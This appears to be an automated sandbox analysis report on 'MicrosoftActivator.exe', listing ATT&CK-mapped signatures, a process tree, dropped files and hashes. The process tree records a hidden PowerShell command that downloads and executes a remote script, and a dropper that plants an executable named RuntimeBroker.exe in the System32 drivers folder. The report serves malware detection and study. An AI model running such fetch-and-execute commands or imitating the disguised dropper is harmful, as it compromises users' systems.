e0580491c1146ad6707ad2d81a080cb6fb545bd6b8e2dbc16e0b06e9780764eb

Resubmissions

12/03/2025, 21:37

250312-1gyvbsvrx7 10

12/03/2025, 21:23

250312-z8hrravpt3 10

Analysis

max time kernel
98s
max time network
96s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250217-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
12/03/2025, 21:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MicrosoftActivator.exe
Size

130.1MB
MD5

57f71793f17ef4f6d1aad11db4b9e402
SHA1

488bbda45048d6dab83d3d725bd97c9b7f8e5987
SHA256

e0580491c1146ad6707ad2d81a080cb6fb545bd6b8e2dbc16e0b06e9780764eb
SHA512

3394f7ba35438b9bc7fad9466ec299851bb5a4a301c48c58eaabcc17e7fd7286257589157937d286359597344a6d9b3a4c26c96c1f89683a5059afd01efa6447
SSDEEP

786432:nkgh3akgh2vk49Otsbyx1DOUNoER7gHk49Otsbyx1DOUNoER7g2:kgJTgwvk49QsmPf2Hk49QsmPf22

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
18	4264	powershell.exe
23	4264	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4264	powershell.exe
4640	powershell.exe
3964	powershell.exe
3352	powershell.exe
4752	powershell.exe
4008	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
14	2264	tmpgfwnrh.tmp.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\RuntimeBroker.exe	tmpgfwnrh.tmp.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1786400979-876203093-3022739302-1000\Control Panel\International\Geo\Nation	MicrosoftActivator.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1786400979-876203093-3022739302-1000\Control Panel\International\Geo\Nation	tmpgfwnrh.tmp.exe

Executes dropped EXE 3 IoCs

pid	Process
2264	tmpgfwnrh.tmp.exe
1028	MicrosoftActivator.exe
2760	RuntimeBroker.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	raw.githubusercontent.com
23	raw.githubusercontent.com

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3920	sc.exe
2560	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3108	PING.EXE
2696	cmd.exe
2580	PING.EXE
1760	cmd.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
4596	timeout.exe
1560	timeout.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2580	PING.EXE
3108	PING.EXE

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
4264	powershell.exe
4264	powershell.exe
4640	powershell.exe
4640	powershell.exe
4640	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3352	powershell.exe
3352	powershell.exe
3352	powershell.exe
4752	powershell.exe
4752	powershell.exe
4752	powershell.exe
4008	powershell.exe
4008	powershell.exe
4008	powershell.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	4264	powershell.exe
Token: SeDebugPrivilege	4640	powershell.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	3352	powershell.exe
Token: SeDebugPrivilege	4752	powershell.exe
Token: SeDebugPrivilege	4008	powershell.exe
Token: SeDebugPrivilege	3712	taskmgr.exe
Token: SeSystemProfilePrivilege	3712	taskmgr.exe
Token: SeCreateGlobalPrivilege	3712	taskmgr.exe
Token: 33	3712	taskmgr.exe
Token: SeIncBasePriorityPrivilege	3712	taskmgr.exe

Suspicious use of FindShellTrayWindow 37 IoCs

pid	Process
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe

Suspicious use of SendNotifyMessage 37 IoCs

pid	Process
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe
3712	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2936 wrote to memory of 2264	2936	MicrosoftActivator.exe	84
PID 2936 wrote to memory of 2264	2936	MicrosoftActivator.exe	84
PID 2936 wrote to memory of 724	2936	MicrosoftActivator.exe	85
PID 2936 wrote to memory of 724	2936	MicrosoftActivator.exe	85
PID 724 wrote to memory of 4596	724	cmd.exe	87
PID 724 wrote to memory of 4596	724	cmd.exe	87
PID 724 wrote to memory of 1560	724	cmd.exe	92
PID 724 wrote to memory of 1560	724	cmd.exe	92
PID 724 wrote to memory of 1028	724	cmd.exe	94
PID 724 wrote to memory of 1028	724	cmd.exe	94
PID 1028 wrote to memory of 5108	1028	MicrosoftActivator.exe	95
PID 1028 wrote to memory of 5108	1028	MicrosoftActivator.exe	95
PID 5108 wrote to memory of 4264	5108	cmd.exe	97
PID 5108 wrote to memory of 4264	5108	cmd.exe	97
PID 2264 wrote to memory of 2760	2264	tmpgfwnrh.tmp.exe	99
PID 2264 wrote to memory of 2760	2264	tmpgfwnrh.tmp.exe	99
PID 4264 wrote to memory of 4688	4264	powershell.exe	100
PID 4264 wrote to memory of 4688	4264	powershell.exe	100
PID 4264 wrote to memory of 5116	4264	powershell.exe	102
PID 4264 wrote to memory of 5116	4264	powershell.exe	102
PID 5116 wrote to memory of 3920	5116	cmd.exe	104
PID 5116 wrote to memory of 3920	5116	cmd.exe	104
PID 5116 wrote to memory of 1680	5116	cmd.exe	105
PID 5116 wrote to memory of 1680	5116	cmd.exe	105
PID 5116 wrote to memory of 2984	5116	cmd.exe	106
PID 5116 wrote to memory of 2984	5116	cmd.exe	106
PID 5116 wrote to memory of 1160	5116	cmd.exe	107
PID 5116 wrote to memory of 1160	5116	cmd.exe	107
PID 5116 wrote to memory of 456	5116	cmd.exe	108
PID 5116 wrote to memory of 456	5116	cmd.exe	108
PID 5116 wrote to memory of 4652	5116	cmd.exe	109
PID 5116 wrote to memory of 4652	5116	cmd.exe	109
PID 5116 wrote to memory of 4052	5116	cmd.exe	110
PID 5116 wrote to memory of 4052	5116	cmd.exe	110
PID 5116 wrote to memory of 4336	5116	cmd.exe	111
PID 5116 wrote to memory of 4336	5116	cmd.exe	111
PID 5116 wrote to memory of 2504	5116	cmd.exe	112
PID 5116 wrote to memory of 2504	5116	cmd.exe	112
PID 2504 wrote to memory of 2788	2504	cmd.exe	113
PID 2504 wrote to memory of 2788	2504	cmd.exe	113
PID 2504 wrote to memory of 4384	2504	cmd.exe	114
PID 2504 wrote to memory of 4384	2504	cmd.exe	114
PID 5116 wrote to memory of 5092	5116	cmd.exe	115
PID 5116 wrote to memory of 5092	5116	cmd.exe	115
PID 5116 wrote to memory of 3604	5116	cmd.exe	116
PID 5116 wrote to memory of 3604	5116	cmd.exe	116
PID 5116 wrote to memory of 1144	5116	cmd.exe	117
PID 5116 wrote to memory of 1144	5116	cmd.exe	117
PID 5116 wrote to memory of 4996	5116	cmd.exe	118
PID 5116 wrote to memory of 4996	5116	cmd.exe	118
PID 1144 wrote to memory of 4640	1144	cmd.exe	119
PID 1144 wrote to memory of 4640	1144	cmd.exe	119
PID 5116 wrote to memory of 3956	5116	cmd.exe	120
PID 5116 wrote to memory of 3956	5116	cmd.exe	120
PID 5116 wrote to memory of 3964	5116	cmd.exe	121
PID 5116 wrote to memory of 3964	5116	cmd.exe	121
PID 5116 wrote to memory of 556	5116	cmd.exe	122
PID 5116 wrote to memory of 556	5116	cmd.exe	122
PID 5116 wrote to memory of 3352	5116	cmd.exe	123
PID 5116 wrote to memory of 3352	5116	cmd.exe	123
PID 3352 wrote to memory of 3988	3352	powershell.exe	124
PID 3352 wrote to memory of 3988	3352	powershell.exe	124
PID 3988 wrote to memory of 2560	3988	cmd.exe	125
PID 3988 wrote to memory of 2560	3988	cmd.exe	125

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\MicrosoftActivator.exe
"C:\Users\Admin\AppData\Local\Temp\MicrosoftActivator.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2936
- C:\Users\Admin\AppData\Local\Temp\tmpgfwnrh.tmp.exe
  "C:\Users\Admin\AppData\Local\Temp\tmpgfwnrh.tmp.exe"
  2⤵
  - Downloads MZ/PE file
  - Drops file in Drivers directory
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2264
- - C:\Windows\System32\drivers\RuntimeBroker.exe
    "C:\Windows\System32\drivers\RuntimeBroker.exe"
    3⤵
    - Executes dropped EXE
    PID:2760
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c timeout 5 && move "C:\Users\Admin\AppData\Local\Temp\tmps0vdts.tmp.exe" "C:\Users\Admin\AppData\Local\Temp\MicrosoftActivator.exe.new" && timeout 1 && del "C:\Users\Admin\AppData\Local\Temp\MicrosoftActivator.exe" && rename "C:\Users\Admin\AppData\Local\Temp\MicrosoftActivator.exe.new" "MicrosoftActivator.exe" && "MicrosoftActivator.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:724
- - C:\Windows\system32\timeout.exe
    timeout 5
    3⤵
    - Delays execution with timeout.exe
    PID:4596
- - C:\Windows\system32\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:1560
- - C:\Users\Admin\AppData\Local\Temp\MicrosoftActivator.exe
    "MicrosoftActivator.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -WindowStyle hidden -c "irm https://get.activated.win | iex"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5108
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle hidden -c "irm https://get.activated.win | iex"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4264
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo CMD is working"
        6⤵
        
        PID:4688
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ""C:\Windows\Temp\MAS_0293c887-4fdc-4cd0-9422-f4137a334c23.cmd" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:5116
        
        C:\Windows\System32\sc.exe
        
        sc query Null
        7⤵
        Launches sc.exe
        
        PID:3920
        
        C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        7⤵
        
        PID:1680
        
        C:\Windows\System32\findstr.exe
        
        findstr /v "$" "MAS_0293c887-4fdc-4cd0-9422-f4137a334c23.cmd"
        7⤵
        
        PID:2984
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c ver
        7⤵
        
        PID:1160
        
        C:\Windows\System32\reg.exe
        
        reg query "HKCU\Console" /v ForceV2
        7⤵
        
        PID:456
        
        C:\Windows\System32\find.exe
        
        find /i "0x0"
        7⤵
        
        PID:4652
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "AMD64 " "
        7⤵
        
        PID:4052
        
        C:\Windows\System32\find.exe
        
        find /i "ARM64"
        7⤵
        
        PID:4336
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c echo prompt $E | cmd
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2504
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo prompt $E "
        8⤵
        
        PID:2788
        
        C:\Windows\System32\cmd.exe
        
        cmd
        8⤵
        
        PID:4384
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "C:\Windows\Temp\MAS_0293c887-4fdc-4cd0-9422-f4137a334c23.cmd" "
        7⤵
        
        PID:5092
        
        C:\Windows\System32\find.exe
        
        find /i "C:\Users\Admin\AppData\Local\Temp"
        7⤵
        
        PID:3604
        
        C:\Windows\System32\cmd.exe
        
        cmd /c "powershell.exe "$f=[io.file]::ReadAllText('C:\Windows\Temp\MAS_0293c887-4fdc-4cd0-9422-f4137a334c23.cmd') -split ':PStest:\s*';iex ($f[1])""
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$f=[io.file]::ReadAllText('C:\Windows\Temp\MAS_0293c887-4fdc-4cd0-9422-f4137a334c23.cmd') -split ':PStest:\s*';iex ($f[1])"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4640
        
        C:\Windows\System32\find.exe
        
        find /i "FullLanguage"
        7⤵
        
        PID:4996
        
        C:\Windows\System32\fltMC.exe
        
        fltmc
        7⤵
        
        PID:3956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('GetConsoleWindow', 'kernel32.dll', 22, 1, [IntPtr], @(), 1, 3).SetImplementationFlags(128); [void]$TB.DefinePInvokeMethod('SendMessageW', 'user32.dll', 22, 1, [IntPtr], @([IntPtr], [UInt32], [IntPtr], [IntPtr]), 1, 3).SetImplementationFlags(128); $hIcon = $TB.CreateType(); $hWnd = $hIcon::GetConsoleWindow(); echo $($hIcon::SendMessageW($hWnd, 127, 0, 0) -ne [IntPtr]::Zero);"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3964
        
        C:\Windows\System32\find.exe
        
        find /i "True"
        7⤵
        
        PID:556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$t=[AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); $t.DefinePInvokeMethod('GetStdHandle', 'kernel32.dll', 22, 1, [IntPtr], @([Int32]), 1, 3).SetImplementationFlags(128); $t.DefinePInvokeMethod('SetConsoleMode', 'kernel32.dll', 22, 1, [Boolean], @([IntPtr], [Int32]), 1, 3).SetImplementationFlags(128); $k=$t.CreateType(); $b=$k::SetConsoleMode($k::GetStdHandle(-10), 0x0080); & cmd.exe '/c' '"""C:\Windows\Temp\MAS_0293c887-4fdc-4cd0-9422-f4137a334c23.cmd""" -el -qedit'"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3352
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ""C:\Windows\Temp\MAS_0293c887-4fdc-4cd0-9422-f4137a334c23.cmd" -el -qedit"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3988
        
        C:\Windows\System32\sc.exe
        
        sc query Null
        9⤵
        Launches sc.exe
        
        PID:2560
        
        C:\Windows\System32\find.exe
        
        find /i "RUNNING"
        9⤵
        
        PID:4964
        
        C:\Windows\System32\findstr.exe
        
        findstr /v "$" "MAS_0293c887-4fdc-4cd0-9422-f4137a334c23.cmd"
        9⤵
        
        PID:708
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "-el -qedit" "
        9⤵
        
        PID:1728
        
        C:\Windows\System32\find.exe
        
        find /i "/"
        9⤵
        
        PID:1740
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c ver
        9⤵
        
        PID:2352
        
        C:\Windows\System32\reg.exe
        
        reg query "HKCU\Console" /v ForceV2
        9⤵
        
        PID:4760
        
        C:\Windows\System32\find.exe
        
        find /i "0x0"
        9⤵
        
        PID:3112
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "AMD64 " "
        9⤵
        
        PID:752
        
        C:\Windows\System32\find.exe
        
        find /i "ARM64"
        9⤵
        
        PID:4596
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c echo prompt $E | cmd
        9⤵
        
        PID:1560
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo prompt $E "
        10⤵
        
        PID:4588
        
        C:\Windows\System32\cmd.exe
        
        cmd
        10⤵
        
        PID:3756
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "C:\Windows\Temp\MAS_0293c887-4fdc-4cd0-9422-f4137a334c23.cmd" "
        9⤵
        
        PID:4500
        
        C:\Windows\System32\find.exe
        
        find /i "C:\Users\Admin\AppData\Local\Temp"
        9⤵
        
        PID:2952
        
        C:\Windows\System32\cmd.exe
        
        cmd /c "powershell.exe "$f=[io.file]::ReadAllText('C:\Windows\Temp\MAS_0293c887-4fdc-4cd0-9422-f4137a334c23.cmd') -split ':PStest:\s*';iex ($f[1])""
        9⤵
        
        PID:4840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$f=[io.file]::ReadAllText('C:\Windows\Temp\MAS_0293c887-4fdc-4cd0-9422-f4137a334c23.cmd') -split ':PStest:\s*';iex ($f[1])"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4752
        
        C:\Windows\System32\find.exe
        
        find /i "FullLanguage"
        9⤵
        
        PID:4968
        
        C:\Windows\System32\fltMC.exe
        
        fltmc
        9⤵
        
        PID:4916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "$TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('GetConsoleWindow', 'kernel32.dll', 22, 1, [IntPtr], @(), 1, 3).SetImplementationFlags(128); [void]$TB.DefinePInvokeMethod('SendMessageW', 'user32.dll', 22, 1, [IntPtr], @([IntPtr], [UInt32], [IntPtr], [IntPtr]), 1, 3).SetImplementationFlags(128); $hIcon = $TB.CreateType(); $hWnd = $hIcon::GetConsoleWindow(); echo $($hIcon::SendMessageW($hWnd, 127, 0, 0) -ne [IntPtr]::Zero);"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4008
        
        C:\Windows\System32\find.exe
        
        find /i "True"
        9⤵
        
        PID:1160
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c ping -4 -n 1 activated.win
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2696
        
        C:\Windows\System32\PING.EXE
        
        ping -4 -n 1 activated.win
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2580
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c ping -4 -n 1 updatecheck30.activated.win
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1760
        
        C:\Windows\System32\PING.EXE
        
        ping -4 -n 1 updatecheck30.activated.win
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3108
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "-el -qedit" "
        9⤵
        
        PID:4360
        
        C:\Windows\System32\find.exe
        
        find /i "/S"
        9⤵
        
        PID:4276
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /S /D /c" echo "-el -qedit" "
        9⤵
        
        PID:1200
        
        C:\Windows\System32\find.exe
        
        find /i "/"
        9⤵
        
        PID:1664
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\System32\cmd.exe /c reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop
        9⤵
        
        PID:4132
        
        C:\Windows\System32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop
        10⤵
        
        PID:1928
        
        C:\Windows\System32\mode.com
        
        mode 76, 34
        9⤵
        
        PID:4628
        
        C:\Windows\System32\choice.exe
        
        choice /C:123456789EH0 /N
        9⤵
        
        PID:3792

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3712

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
ed30ca9187bf5593affb3dc9276309a6

SHA1
c63757897a6c43a44102b221fe8dc36355e99359

SHA256
81fc6cfe81caf86f84e1285cb854082ac5e127335b5946da154a73f7aa9c2122

SHA512
1df4f44b207bb30fecee119a2f7f7ab7a0a0aed4d58eeabbec5791d5a6d9443cccffa5479ad4da094e6b88c871720d2e4bcf14ebec45a587ee4ec5e572f37810

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
aa1b22941ad0ec24a2b63dd9a043e85b

SHA1
ba92b36b71a74f16261913dfb2fccdbe984a4d31

SHA256
1d288a199c43928307beedbb402776c5592c79664d25d9a4da7125f99db9a1f5

SHA512
2ba24e81087af3379821fb669b77b1401c80b2fc56a6c9f1916dde42c59f7340f0a20658e313cf7113e36c37708ebf0f7d1768dc7375907992b3c180dc36e4cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dbac284df5d085bf52e00cb6ec219bfd

SHA1
bdaceda191a7f0a646d3866102a25b3fb7a6f45c

SHA256
1a2cc170a183db403c7de5187c33aa6ffaf434804bdf88a410da2633d288d535

SHA512
03675d30e3dc8502a577778aa74a25528e897b516cc8aceb890c4043108666e4135a0624cf074f74bda15dcc4f14f639ad355d9d5c4551f0fa43d7dcd78548c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ia0lq2ji.ldi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmps0vdts.tmp.exe

Filesize
11KB

MD5
4e34a68c10cc03367a3405a4c58cf521

SHA1
9ce8bac314039393b45c3e2266a7fca30360c930

SHA256
a2860e3a95d93bfb5d5e761980f12ef1bacfbe111233a6d755f8f72129425d47

SHA512
c80dd25d4577e7148bb98c49d19261affb89a48be1aa548d32a800b77c79d5a778d106a53df103c8f88f4c51dff01cac6eae3f63ce6c9c388d8255a6c1153d0d

Download Submit
C:\Windows\Temp\MAS_0293c887-4fdc-4cd0-9422-f4137a334c23.cmd

Filesize
651KB

MD5
ee1de2f0b2371316d5dfa33e954afe4a

SHA1
1932d932e52f651da9700685d204ca7bac89bfc9

SHA256
2fc7c2763df08e0f447e552f462af392ac97ae452be3ad3f9de99ea564bcb813

SHA512
67dc80ed2282de9ad1dd1d8b330ad03862cfa57875fee192d39743f3d8611af509d51e0e1f8e8281f324e06631757ef07585cc176169387c2ae96aafff1fa989

Download Submit
memory/3352-95-0x0000028FE5940000-0x0000028FE5A8F000-memory.dmp

Filesize
1.3MB

Download
memory/3712-107-0x000002B0D30E0000-0x000002B0D30E1000-memory.dmp

Filesize
4KB

Download
memory/3712-105-0x000002B0D30E0000-0x000002B0D30E1000-memory.dmp

Filesize
4KB

Download
memory/3712-102-0x000002B0D30E0000-0x000002B0D30E1000-memory.dmp

Filesize
4KB

Download
memory/3712-103-0x000002B0D30E0000-0x000002B0D30E1000-memory.dmp

Filesize
4KB

Download
memory/3712-104-0x000002B0D30E0000-0x000002B0D30E1000-memory.dmp

Filesize
4KB

Download
memory/3712-106-0x000002B0D30E0000-0x000002B0D30E1000-memory.dmp

Filesize
4KB

Download
memory/3712-108-0x000002B0D30E0000-0x000002B0D30E1000-memory.dmp

Filesize
4KB

Download
memory/3712-96-0x000002B0D30E0000-0x000002B0D30E1000-memory.dmp

Filesize
4KB

Download
memory/3712-98-0x000002B0D30E0000-0x000002B0D30E1000-memory.dmp

Filesize
4KB

Download
memory/3712-97-0x000002B0D30E0000-0x000002B0D30E1000-memory.dmp

Filesize
4KB

Download
memory/3964-60-0x0000016DC3F80000-0x0000016DC40CF000-memory.dmp

Filesize
1.3MB

Download
memory/4008-93-0x000001C4CEDB0000-0x000001C4CEEFF000-memory.dmp

Filesize
1.3MB

Download
memory/4264-33-0x000002E1C73F0000-0x000002E1C75B2000-memory.dmp

Filesize
1.8MB

Download
memory/4264-17-0x000002E1AE950000-0x000002E1AE972000-memory.dmp

Filesize
136KB

Download
memory/4264-94-0x000002E1C6D00000-0x000002E1C6E4F000-memory.dmp

Filesize
1.3MB

Download
memory/4640-47-0x0000020CE76C0000-0x0000020CE780F000-memory.dmp

Filesize
1.3MB

Download
memory/4752-81-0x00000184D4B70000-0x00000184D4CBF000-memory.dmp

Filesize
1.3MB

Download